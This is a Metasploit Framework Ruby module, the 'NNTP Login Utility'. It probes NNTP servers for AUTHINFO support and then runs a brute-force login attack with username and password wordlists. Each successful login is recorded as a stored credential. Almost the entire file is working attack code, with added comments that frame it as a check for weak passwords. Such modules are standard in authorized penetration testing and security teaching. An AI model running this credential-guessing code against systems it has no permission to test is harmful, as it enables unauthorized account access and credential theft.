Path: blob/master/modules/auxiliary/scanner/nntp/nntp_login.rb
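##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary scanner that tries username/password pairs against NNTP services
# using AUTHINFO USER/PASS and records each successful login as a credential.
#
# Defensive note: the module's own reference is CVE-1999-0502 (weak password),
# so any success it reports is a weak or default credential on that service.
class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Scanner
  include Msf::Exploit::Remote::Tcp

  # Registers module metadata and the default port and wordlist options.
  #
  # @param info [Hash] metadata overrides merged through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'NNTP Login Utility',
      'Description' => %q{
        This module attempts to authenticate to NNTP services
        which support the AUTHINFO authentication extension.

        This module supports AUTHINFO USER/PASS authentication,
        but does not support AUTHINFO GENERIC or AUTHINFO SASL
        authentication methods.
      },
      'Author'      => 'bcoles',
      'License'     => MSF_LICENSE,
      'References'  => [ [ 'CVE', '1999-0502' ], # Weak password
                         [ 'URL', 'https://datatracker.ietf.org/doc/html/rfc3977' ],
                         [ 'URL', 'https://datatracker.ietf.org/doc/html/rfc4642' ],
                         [ 'URL', 'https://datatracker.ietf.org/doc/html/rfc4643' ] ]))
    register_options(
      [
        Opt::RPORT(119),
        OptPath.new('USER_FILE', [ false, 'The file that contains a list of probable usernames.',
                                   File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_users.txt') ]),
        OptPath.new('PASS_FILE', [ false, 'The file that contains a list of probable passwords.',
                                   File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt') ])
      ])
  end

  # Checks one host: confirms the service answers like NNTP and advertises
  # AUTHINFO, records the service, then runs do_login for every pair yielded
  # by each_user_pass.
  #
  # @param ip [String] target address supplied by the scanner mixin (the body
  #   reads rhost/rport instead)
  # @return [Symbol, nil] :abort when either pre-check fails
  def run_host(ip)
    connect
    return :abort unless nntp?
    return :abort unless supports_authinfo?

    report_service :host => rhost,
                   :port => rport,
                   :proto => 'tcp',
                   :name => 'nntp'
    # The probe connection is closed here; do_login opens its own connection
    # for every attempt.
    disconnect

    each_user_pass { |user, pass| do_login user, pass }
  rescue ::Interrupt
    # Bare raise re-raises the exception being handled, so this no longer
    # depends on the English library's $ERROR_INFO alias being loaded.
    raise
  rescue EOFError, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
    print_error "#{peer} Connection failed"
    return
  rescue OpenSSL::SSL::SSLError => e
    print_error "SSL negotiation failed: #{e}"
  rescue => e
    print_error "#{peer} Error: #{e.class} #{e} #{e.backtrace}"
    return
  ensure
    disconnect
  end

  # Reads the greeting and decides whether the peer looks like an NNTP server.
  #
  # @return [Boolean] true only when the greeting starts with "200"
  def nntp?
    banner = sock.get_once

    unless banner
      vprint_error "#{peer} No response"
      return false
    end

    # \A anchors to the start of the reply; ^ would also match a "200" that
    # begins any later line of a multi-line banner.
    # NOTE(review): RFC 3977 also defines a 201 greeting (posting prohibited);
    # servers answering 201 are reported as 'Unexpected reply' here.
    if banner !~ /\A200/
      print_error 'Unexpected reply'
      return false
    end

    vprint_status 'Server is a NNTP server'
    vprint_status "Banner: #{banner}"
    true
  end

  # Sends HELP and inspects the reply for AUTHINFO support.
  #
  # @return [Boolean] true when the reply code is 480, or when it is 100 and
  #   the reply text mentions "authinfo" (case-insensitive)
  def supports_authinfo?
    sock.put "HELP\r\n"
    res = sock.get(-1)

    # Guard the empty read explicitly; calling scan on nil would otherwise
    # surface as a NoMethodError with a backtrace in run_host.
    unless res
      vprint_error "#{peer} No response"
      return false
    end

    # to_i turns a missing status code into 0 and never returns nil, so the
    # "not NNTP" case has to be detected with zero?.
    code = res.scan(/\A(\d+)\s/).flatten.first.to_i

    if code.zero?
      print_error 'Server is not a NNTP server'
      return false
    end

    if code == 480
      vprint_warning 'Authentication is required before listing authentication capabilities.'
      return true
    end

    if code == 100 && res =~ /authinfo/i
      vprint_status 'Server supports AUTHINFO'
      return true
    end

    print_error 'Server does not support AUTHINFO'
    false
  end

  # Tries one username/password pair over a fresh connection.
  #
  # Verbose output includes the candidate password in cleartext, so console
  # and spool logs from a run should be handled as sensitive data.
  #
  # @param user [String] username sent with AUTHINFO USER
  # @param pass [String] password sent with AUTHINFO PASS
  # @return [Symbol, nil] :abort on no response or an SSL error, :skip_user
  #   when the username is not answered with 381, :next_user on a 281 success,
  #   nil otherwise
  def do_login(user, pass)
    vprint_status "Trying username:'#{user}' with password:'#{pass}'"

    connect
    # Read and discard the greeting before authenticating.
    sock.get_once

    sock.put "AUTHINFO USER #{user}\r\n"
    res = sock.get_once
    unless res
      vprint_error "#{peer} No response"
      return :abort
    end

    # Only 381 is treated as "send the password next".
    code = res.scan(/\A(\d+)\s/).flatten.first.to_i
    if code != 381
      vprint_error "#{peer} Unexpected reply. Skipping user..."
      return :skip_user
    end

    sock.put "AUTHINFO PASS #{pass}\r\n"
    res = sock.get_once
    unless res
      vprint_error "#{peer} No response"
      return :abort
    end

    code = res.scan(/\A(\d+)\s/).flatten.first.to_i
    case code
    when 452, 481
      vprint_error "#{peer} Login failed"
      nil
    when 281
      print_good "#{peer} Successful login with: '#{user}' : '#{pass}'"
      report_cred ip: rhost,
                  port: rport,
                  service_name: 'nntp',
                  user: user,
                  password: pass,
                  proof: code.to_s
      :next_user
    else
      vprint_error "#{peer} Failed login as: '#{user}' - Unexpected reply: #{res.inspect}"
      nil
    end
  rescue EOFError, ::Rex::ConnectionError, ::Errno::ECONNREFUSED, ::Errno::ETIMEDOUT
    print_error 'Connection failed'
    nil
  rescue OpenSSL::SSL::SSLError => e
    print_error "SSL negotiation failed: #{e}"
    :abort
  rescue => e
    print_error "Error: #{e}"
    nil
  ensure
    # Runs on every exit path so each attempt releases its connection.
    disconnect
  end

  # Stores a successful login as a credential plus a login record.
  #
  # @param opts [Hash] reads :ip, :port, :service_name, :user, :password and
  #   :proof
  # @return the result of create_credential_login
  def report_cred(opts)
    service_data = { address: opts[:ip],
                     port: opts[:port],
                     service_name: opts[:service_name],
                     protocol: 'tcp',
                     workspace_id: myworkspace_id }

    credential_data = { origin_type: :service,
                        module_fullname: fullname,
                        username: opts[:user],
                        private_data: opts[:password],
                        private_type: :password }.merge service_data

    login_data = { last_attempted_at: DateTime.now,
                   core: create_credential(credential_data),
                   status: Metasploit::Model::Login::Status::SUCCESSFUL,
                   proof: opts[:proof] }.merge service_data

    create_credential_login login_data
  end
end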